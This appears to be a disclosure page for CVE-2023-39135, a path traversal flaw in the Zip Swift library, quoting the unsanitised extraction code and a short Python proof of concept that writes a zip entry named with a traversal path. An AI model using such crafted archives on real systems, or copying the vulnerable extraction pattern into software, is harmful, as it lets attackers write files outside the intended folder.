Headline
CVE-2023-39135: Path traversal vulnerability · Issue #245 · marmelroy/Zip
An issue in Zip Swift v2.1.2 allows attackers to execute a path traversal attack via a crafted zip entry.
Description:
The package does not validate paths coming from zip entries, hence allowing for path traversal
Technical details:
Below is a code snippet from the unzipFile function used to extract zip files, you can notice that pathString coming from our zip entry is appended to the destination directory without any sanitization
let fileNameSize = Int(fileInfo.size_filename) + 1 //let fileName = UnsafeMutablePointer<CChar>(allocatingCapacity: fileNameSize) let fileName = UnsafeMutablePointer<CChar>.allocate(capacity: fileNameSize)
unzGetCurrentFileInfo64(zip, &fileInfo, fileName, UInt(fileNameSize), nil, 0, nil, 0) fileName[Int(fileInfo.size_filename)] = 0
var pathString = String(cString: fileName)
guard pathString.count > 0 else { throw ZipError.unzipFail }
var isDirectory = false let fileInfoSizeFileName = Int(fileInfo.size_filename-1) if (fileName[fileInfoSizeFileName] == "/".cString(using: String.Encoding.utf8)?.first || fileName[fileInfoSizeFileName] == "\\".cString(using: String.Encoding.utf8)?.first) { isDirectory = true; } free(fileName) if pathString.rangeOfCharacter(from: CharacterSet(charactersIn: “/\\”)) != nil { pathString = pathString.replacingOccurrences(of: "\\", with: “/”) }
let fullPath = destination.appendingPathComponent(pathString).path
Exploit code:
import zipfile
def compress_file(filename): with zipfile.ZipFile('payload.zip’, ‘w’) as zipf: zipf.writestr(filename, “Test payload”)
filename = ‘…/secret.txt’
compress_file(filename)
Related news
An issue in Zip Swift v2.1.2 allows attackers to execute a path traversal attack via a crafted zip entry.
An issue in Archive v3.3.7 allows attackers to execute a path traversal via extracting a crafted zip file.